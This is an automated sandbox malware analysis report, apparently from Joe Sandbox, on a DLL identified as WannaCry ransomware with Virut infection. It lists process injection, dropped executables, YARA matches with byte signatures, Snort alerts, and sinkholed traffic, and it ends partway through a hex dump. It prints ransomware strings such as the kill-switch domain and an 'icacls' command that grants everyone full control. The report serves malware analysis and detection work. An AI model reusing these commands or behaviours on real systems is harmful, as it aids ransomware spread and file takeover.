Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FjYNZSPNkt

Overview

General Information

Sample Name:FjYNZSPNkt (renamed file extension from none to dll)
Analysis ID:670186
MD5:9209f16a98096aafd9686e3b0dffef02
SHA1:eef3b058acf4631d573a77ec9fb787d3d876f81d
SHA256:b74df112f9ecc4658a997f870dff5d36b2a8f5df8685da1fb70227395e7eb009
Tags:dllOpenCTIBRSandboxed
Infos:

Detection

Wannacry, Virut
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Yara detected Virut
Antivirus / Scanner detection for submitted sample
Tries to download HTTP data from a sinkholed server
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Found evasive API chain (may execute only at specific dates)
Writes to foreign memory regions
PE file has a writeable .text section
Changes memory attributes in foreign processes to executable or writable
Tries to evade debugger and weak emulator (self modifying code)
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
Machine Learning detection for dropped file
Creates a thread in another existing process (thread injection)
Tries to resolve many domain names, but no domain seems valid
Drops executables to the windows directory (C:\Windows) and starts them
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6272 cmdline: loaddll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6280 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6300 cmdline: rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • mssecsvc.exe (PID: 6408 cmdline: C:\WINDOWS\mssecsvc.exe MD5: D6F23DCB793C969936142BF9B4F53837)
          • winlogon.exe (PID: 572 cmdline: winlogon.exe MD5: F9017F2DC455AD373DF036F5817A8870)
          • lsass.exe (PID: 612 cmdline: C:\Windows\system32\lsass.exe MD5: 317340CD278A374BCEF6A30194557227)
            • backgroundTaskHost.exe (PID: 4912 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca MD5: B7FC4A29431D4F795BBAB1FB182B759A)
          • fontdrvhost.exe (PID: 708 cmdline: fontdrvhost.exe MD5: 31113981180E69C2773BCADA4051738A)
          • fontdrvhost.exe (PID: 716 cmdline: fontdrvhost.exe MD5: 31113981180E69C2773BCADA4051738A)
          • svchost.exe (PID: 724 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 804 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
            • BackgroundTransferHost.exe (PID: 6784 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
            • backgroundTaskHost.exe (PID: 6420 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca MD5: B7FC4A29431D4F795BBAB1FB182B759A)
          • svchost.exe (PID: 852 cmdline: c:\windows\system32\svchost.exe -k rpcss -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 900 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • dwm.exe (PID: 984 cmdline: dwm.exe MD5: 70073A05B2B43FFB7A625708BB29E7C7)
          • svchost.exe (PID: 1020 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 316 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 416 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 948 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 960 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1132 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1200 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: 32569E403279B3FD2EDB7EBD036273FA)
          • svchost.exe (PID: 1272 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • rundll32.exe (PID: 6288 cmdline: rundll32.exe C:\Users\user\Desktop\FjYNZSPNkt.dll,PlayGame MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6420 cmdline: rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",PlayGame MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • mssecsvc.exe (PID: 6440 cmdline: C:\WINDOWS\mssecsvc.exe MD5: D6F23DCB793C969936142BF9B4F53837)
        • tasksche.exe (PID: 3908 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 3233ACED9279EF54267C479BBA665B90)
  • mssecsvc.exe (PID: 6580 cmdline: C:\WINDOWS\mssecsvc.exe -m security MD5: D6F23DCB793C969936142BF9B4F53837)
  • svchost.exe (PID: 6636 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6744 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6844 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6900 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6972 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6992 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7024 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3852 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6288 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6700 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
FjYNZSPNkt.dllWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
  • 0x45604:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x353d0:$x3: tasksche.exe
  • 0x455e0:$x3: tasksche.exe
  • 0x455bc:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0x45634:$x5: WNcry@2ol7
  • 0x3543b:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
  • 0x3028:$x7: mssecsvc.exe
  • 0x120ac:$x7: mssecsvc.exe
  • 0x1b3b4:$x7: mssecsvc.exe
  • 0x353a8:$x8: C:\%s\qeriuwjhrf
  • 0x45604:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0x3014:$s1: C:\%s\%s
  • 0x12098:$s1: C:\%s\%s
  • 0x1b39c:$s1: C:\%s\%s
  • 0x353bc:$s1: C:\%s\%s
  • 0x45534:$s3: cmd.exe /c "%s"
  • 0x77a88:$s4: msg/m_portuguese.wnry
  • 0x326f0:$s5: \\192.168.56.20\IPC$
  • 0x1fae5:$s6: \\172.16.99.5\IPC$
  • 0xd195:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
  • 0x78da:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
FjYNZSPNkt.dllJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
    FjYNZSPNkt.dllwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
    • 0x455e0:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0x45608:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\tasksche.exeWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
    • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
    • 0xf4d8:$x3: tasksche.exe
    • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
    • 0xf52c:$x5: WNcry@2ol7
    • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
    • 0xf42c:$s3: cmd.exe /c "%s"
    • 0x41980:$s4: msg/m_portuguese.wnry
    • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
    • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
    • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
    C:\Windows\tasksche.exewanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
    • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
    C:\Windows\tasksche.exeWin32_Ransomware_WannaCryunknownReversingLabs
    • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
    • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
    C:\Windows\mssecsvc.exeWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
    • 0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q
    • 0x3136c:$x3: tasksche.exe
    • 0x4157c:$x3: tasksche.exe
    • 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA
    • 0x415d0:$x5: WNcry@2ol7
    • 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
    • 0xe048:$x7: mssecsvc.exe
    • 0x17350:$x7: mssecsvc.exe
    • 0x31344:$x8: C:\%s\qeriuwjhrf
    • 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q
    • 0xe034:$s1: C:\%s\%s
    • 0x17338:$s1: C:\%s\%s
    • 0x31358:$s1: C:\%s\%s
    • 0x414d0:$s3: cmd.exe /c "%s"
    • 0x73a24:$s4: msg/m_portuguese.wnry
    • 0x2e68c:$s5: \\192.168.56.20\IPC$
    • 0x1ba81:$s6: \\172.16.99.5\IPC$
    • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
    • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
    • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
    • 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
    C:\Windows\mssecsvc.exeWannaCry_Ransomware_GenDetects WannaCry RansomwareFlorian Roth (based on rule by US CERT)
    • 0x1bacc:$s1: __TREEID__PLACEHOLDER__
    • 0x1bb68:$s1: __TREEID__PLACEHOLDER__
    • 0x1c3d4:$s1: __TREEID__PLACEHOLDER__
    • 0x1d439:$s1: __TREEID__PLACEHOLDER__
    • 0x1e4a0:$s1: __TREEID__PLACEHOLDER__
    • 0x1f508:$s1: __TREEID__PLACEHOLDER__
    • 0x20570:$s1: __TREEID__PLACEHOLDER__
    • 0x215d8:$s1: __TREEID__PLACEHOLDER__
    • 0x22640:$s1: __TREEID__PLACEHOLDER__
    • 0x236a8:$s1: __TREEID__PLACEHOLDER__
    • 0x24710:$s1: __TREEID__PLACEHOLDER__
    • 0x25778:$s1: __TREEID__PLACEHOLDER__
    • 0x267e0:$s1: __TREEID__PLACEHOLDER__
    • 0x27848:$s1: __TREEID__PLACEHOLDER__
    • 0x288b0:$s1: __TREEID__PLACEHOLDER__
    • 0x29918:$s1: __TREEID__PLACEHOLDER__
    • 0x2a980:$s1: __TREEID__PLACEHOLDER__
    • 0x2ab94:$s1: __TREEID__PLACEHOLDER__
    • 0x2abf4:$s1: __TREEID__PLACEHOLDER__
    • 0x2e2c4:$s1: __TREEID__PLACEHOLDER__
    • 0x2e340:$s1: __TREEID__PLACEHOLDER__
    Click to see the 3 entries

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000018.00000000.314054124.000000007FFD0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VirutYara detected VirutJoe Security
      0000000F.00000002.784858800.000000007FFD0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VirutYara detected VirutJoe Security
        00000007.00000002.784858660.000000007FFD0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VirutYara detected VirutJoe Security
          0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_VirutYara detected VirutJoe Security
            0000000D.00000002.785329108.000000007FFF0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_VirutYara detected VirutJoe Security
              Click to see the 91 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              4.0.mssecsvc.exe.7100a4.3.raw.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
              • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
              • 0xf4d8:$x3: tasksche.exe
              • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
              • 0xf52c:$x5: WNcry@2ol7
              • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
              • 0xf42c:$s3: cmd.exe /c "%s"
              • 0x41980:$s4: msg/m_portuguese.wnry
              • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
              • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
              • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
              4.0.mssecsvc.exe.7100a4.3.raw.unpackwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
              • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
              • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
              4.0.mssecsvc.exe.7100a4.3.raw.unpackWin32_Ransomware_WannaCryunknownReversingLabs
              • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
              • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
              4.0.mssecsvc.exe.7100a4.7.unpackWannaCry_RansomwareDetects WannaCry RansomwareFlorian Roth (with the help of binar.ly)
              • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
              • 0xf4d8:$x3: tasksche.exe
              • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
              • 0xf52c:$x5: WNcry@2ol7
              • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
              • 0xf42c:$s3: cmd.exe /c "%s"
              • 0x41980:$s4: msg/m_portuguese.wnry
              • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
              • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
              • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
              4.0.mssecsvc.exe.7100a4.7.unpackwanna_cry_ransomware_genericdetects wannacry ransomware on disk and in virtual pageus-cert code analysis team
              • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
              • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
              Click to see the 135 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:8.8.8.8192.168.2.453575462811577 07/20/22-17:55:02.126057
              SID:2811577
              Source Port:53
              Destination Port:57546
              Protocol:UDP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.48.8.8.860381532012730 07/20/22-17:53:18.256471
              SID:2012730
              Source Port:60381
              Destination Port:53
              Protocol:UDP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.48.8.8.856509532024281 07/20/22-17:53:49.518877
              SID:2024281
              Source Port:56509
              Destination Port:53
              Protocol:UDP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.4104.16.173.8049756802024298 07/20/22-17:51:12.245255
              SID:2024298
              Source Port:49756
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.16.173.80192.168.2.480497562031515 07/20/22-17:51:12.277768
              SID:2031515
              Source Port:80
              Destination Port:49756
              Protocol:TCP
              Classtype:Misc activity
              Timestamp:192.168.2.48.8.8.858171532024291 07/20/22-17:54:08.365418
              SID:2024291
              Source Port:58171
              Destination Port:53
              Protocol:UDP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.48.8.8.863284532012730 07/20/22-17:55:12.427931
              SID:2012730
              Source Port:63284
              Destination Port:53
              Protocol:UDP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.48.8.8.860506532024291 07/20/22-17:51:12.176394
              SID:2024291
              Source Port:60506
              Destination Port:53
              Protocol:UDP
              Classtype:A Network Trojan was detected
              Timestamp:104.17.244.81192.168.2.480497922031515 07/20/22-17:54:08.478476
              SID:2031515
              Source Port:80
              Destination Port:49792
              Protocol:TCP
              Classtype:Misc activity
              Timestamp:192.168.2.4104.17.244.8149792802024298 07/20/22-17:54:08.444562
              SID:2024298
              Source Port:49792
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:8.8.8.8192.168.2.453524722811577 07/20/22-17:54:18.402667
              SID:2811577
              Source Port:53
              Destination Port:52472
              Protocol:UDP
              Classtype:A Network Trojan was detected
              Timestamp:8.8.8.8192.168.2.453501212811577 07/20/22-17:54:40.097301
              SID:2811577
              Source Port:53
              Destination Port:50121
              Protocol:UDP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: FjYNZSPNkt.dllVirustotal: Detection: 86%Perma Link
              Source: FjYNZSPNkt.dllMetadefender: Detection: 78%Perma Link
              Source: FjYNZSPNkt.dllReversingLabs: Detection: 96%
              Antivirus / Scanner detection for submitted sample
              Source: FjYNZSPNkt.dllAvira: detected
              Antivirus detection for URL or domain
              Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/URL Reputation: Label: malware
              Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/xAvira URL Cloud: Label: malware
              Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comURL Reputation: Label: malware
              Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/lAvira URL Cloud: Label: malware
              Source: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwerAvira URL Cloud: Label: malware
              Multi AV Scanner detection for domain / URL
              Source: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comVirustotal: Detection: 12%Perma Link
              Antivirus detection for dropped file
              Source: C:\Windows\mssecsvc.exeAvira: detection malicious, Label: W32/Virut.Gen
              Source: C:\Windows\tasksche.exeAvira: detection malicious, Label: TR/FileCoder.AU
              Multi AV Scanner detection for dropped file
              Source: C:\Windows\mssecsvc.exeReversingLabs: Detection: 96%
              Source: C:\Windows\tasksche.exeMetadefender: Detection: 85%Perma Link
              Source: C:\Windows\tasksche.exeReversingLabs: Detection: 95%
              Machine Learning detection for sample
              Source: FjYNZSPNkt.dllJoe Sandbox ML: detected
              Machine Learning detection for dropped file
              Source: C:\Windows\mssecsvc.exeJoe Sandbox ML: detected
              Source: C:\Windows\tasksche.exeJoe Sandbox ML: detected
              Source: 4.0.mssecsvc.exe.400000.6.unpackAvira: Label: W32/Virut.Gen
              Source: 4.2.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
              Source: 29.0.tasksche.exe.400000.0.unpackAvira: Label: TR/FileCoder.AU
              Source: 6.0.mssecsvc.exe.7100a4.5.unpackAvira: Label: TR/FileCoder.AU
              Source: 6.0.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
              Source: 11.0.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
              Source: 4.2.mssecsvc.exe.400000.0.unpackAvira: Label: W32/Virut.Gen
              Source: 4.0.mssecsvc.exe.400000.0.unpackAvira: Label: W32/Virut.Gen
              Source: 6.2.mssecsvc.exe.400000.0.unpackAvira: Label: W32/Virut.Gen
              Source: 4.0.mssecsvc.exe.400000.2.unpackAvira: Label: W32/Virut.Gen
              Source: 4.0.mssecsvc.exe.400000.4.unpackAvira: Label: W32/Virut.Gen
              Source: 4.0.mssecsvc.exe.7100a4.5.unpackAvira: Label: TR/FileCoder.AU
              Source: 6.0.mssecsvc.exe.7100a4.7.unpackAvira: Label: TR/FileCoder.AU
              Source: 6.0.mssecsvc.exe.400000.2.unpackAvira: Label: W32/Virut.Gen
              Source: 4.0.mssecsvc.exe.7100a4.7.unpackAvira: Label: TR/FileCoder.AU
              Source: 4.0.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
              Source: 11.2.mssecsvc.exe.400000.0.unpackAvira: Label: W32/Virut.Gen
              Source: 6.0.mssecsvc.exe.7100a4.3.unpackAvira: Label: TR/FileCoder.AU
              Source: 29.2.tasksche.exe.400000.0.unpackAvira: Label: TR/FileCoder.AU
              Source: 6.0.mssecsvc.exe.400000.0.unpackAvira: Label: W32/Virut.Gen
              Source: 6.2.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
              Source: 4.0.mssecsvc.exe.7100a4.3.unpackAvira: Label: TR/FileCoder.AU
              Source: 6.0.mssecsvc.exe.400000.4.unpackAvira: Label: W32/Virut.Gen
              Source: 11.0.mssecsvc.exe.400000.0.unpackAvira: Label: W32/Virut.Gen
              Source: 11.2.mssecsvc.exe.7100a4.1.unpackAvira: Label: TR/FileCoder.AU
              Source: 6.0.mssecsvc.exe.400000.6.unpackAvira: Label: W32/Virut.Gen
              Source: C:\Windows\tasksche.exeCode function: 29_2_004018B9 CryptReleaseContext,29_2_004018B9
              Source: FjYNZSPNkt.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL

              Networking

              barindex
              Tries to download HTTP data from a sinkholed server
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jul 2022 15:51:12 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 72dcdb5d9c7e9ba6-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 